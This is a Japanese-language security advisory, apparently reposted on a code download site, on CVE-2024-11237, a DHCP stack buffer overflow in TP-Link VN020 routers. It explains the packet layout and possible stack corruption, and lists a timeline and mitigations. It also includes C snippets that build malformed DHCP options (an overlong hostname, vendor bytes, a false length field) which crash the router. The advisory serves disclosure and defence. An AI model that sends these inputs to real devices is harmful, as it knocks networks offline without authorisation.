ホーム>プログラミング関連>その他のソースコード
ダウンロード

TP-Link VN020 DHCPメモリ腐敗(CVE-2024-11237)

DHCPパケット処理における重大な脆弱性

概要

ファームウェアバージョンを実行しているTP-Link VN020 F3V(T)ルーターTT_V6.2.1021で重要な脆弱性が発見されています。この脆弱性により、リモート攻撃者は、特別に作成されたDHCP発見パケットを介してスタックベースのバッファーオーバーフローをトリガーでき、サービス拒否(DOS)条件につながります。

影響を受けるデバイス:

  • ルーターモデル:TP-Link VN020-F3V(T)
  • ファームウェアバージョン:TT_V6.2.1021
  • 展開:主にチュニジーテレコムとトップネットISPを介して
  • 確認されたバリアント:アルジェリアとモロッコのバージョンにも影響します

重要な注意:ファームウェアの独自の性質により、正確な内部実装の詳細は不明です。この分析は、観察された動作とブラックボックステストに基づいています。

脆弱性の詳細

  • CVE ID :CVE-2024-11237
  • タイプ:スタックベースのバッファオーバーフロー(CWE-121)
  • 攻撃ベクトル:リモート(DHCP発見パケット)
  • 認証:必要ありません
  • ポート:UDP/67(DHCPサーバー)
  • 影響:DOS(確認)&rce(可能)
  • 複雑さ:低い

テクニカル分析

DHCPパケット構造

 [Basic DHCP Header]
0x00: 01        ; BOOTREQUEST
0x01: 01        ; Hardware type (Ethernet)
0x02: 06        ; Hardware address length
0x03: 00        ; Hops
0x04-0x07: XID  ; Random transaction ID
0x08-0x09: 0000 ; Seconds elapsed
0x0A-0x0B: 8000 ; Flags (Broadcast)
0x0C-0x1F: 0000 ; Client/Server/Gateway IPs
0x20-0x28: MAC  ; Client hardware address
0x29-0x2C: 0000 ; Padding

搾取ベクター

  1. DHCPホスト名処理
 // Overflow trigger through hostname option
unsigned char long_hostname [ 128 ];
memset ( long_hostname , 'A' , sizeof ( long_hostname ) - 1 );
long_hostname [ 127 ] = '' ;
add_option ( packet , offset , 0x0C , 127 , long_hostname );
  1. ベンダー固有のオプション
 // Vendor option manipulation
unsigned char vendor_specific [] = { 
    0x00 , 0x14 , 0x22 ,  // TP-Link vendor prefix
    0xFF , 0xFF , 0xFF   // Trigger condition
};
add_option ( packet , offset , 0x2B , sizeof ( vendor_specific ), vendor_specific );
  1. 長さのフィールド操作
 // Claimed vs actual length mismatch
add_option ( packet , offset , 0x3D , 0xFF , ( unsigned char []) { 0x01 });

潜在的な記憶腐敗

正確な内部実装は不明ですが、観察された動作は潜在的な記憶腐敗の問題を示唆しています。

通常のDHCPホスト名処理

 Stack Layout (Normal Case)
+------------------------+ Higher addresses
|     Previous Frame     |
+------------------------+
|   Return Address (4)   |
+------------------------+
|    Saved EBP (4)       |
+------------------------+
|                        |
|   Hostname Buffer      |
|      (64 bytes)        |
|                        |
+------------------------+ Lower addresses
|    Other Variables     |
+------------------------+

ルーター内で何が起こる可能性がありますか? 

 Stack Layout (Overflow Case)
+------------------------+ Higher addresses
|     Previous Frame     |
+------------------------+
|   Overwritten Return   | 
+------------------------+
|   Overwritten EBP      | <- Unknown state corruption
+------------------------+
|     Overflow Data      | <- 127 bytes of 'A'
|         ...            |
+------------------------+ Lower addresses
|    Other Variables     | <- Potentially corrupted
+------------------------+

これは理論的であり、TP-LinkがこのルーターのファームウェアをISPだけに提供するため、特定の詳細は完全に正確ではない場合があります。

ビデオデモンストレーション

poc.mp4
wireshark.mp4

ルーターは、ここに示すようにここに示すように、自己再起動を試みることもあります。

router_effect.mp4

観察された影響

  • 即時デバイスの無反応
  • DHCPサービスの失敗
  • 自動ルーターの再起動
  • 手動介入を必要とするネットワークの混乱

タイムライン

  • 最初の発見:2024年10月20日
  • ベンダー通知:2024年11月3日
  • CVE割り当て:2024年11月15日

緩和

現在、公式のパッチは利用できません。一時的な軽減には次のものがあります。

  1. 不要な場合はDHCPサーバーを無効にします
  2. ネットワークエッジにDHCPトラフィックフィルタリングを実装します
  3. 可能であれば、代替ルーターモデルを検討してください

参照

  1. CVE-2024-11237
  2. CWE-121:スタックベースのバッファオーバーフロー

研究者

モハメド・マタラ

  • Github:@zephkek
  • 所属:独立したセキュリティ研究者
拡大する
追加情報
関連アプリ
おすすめ
関連情報 すべて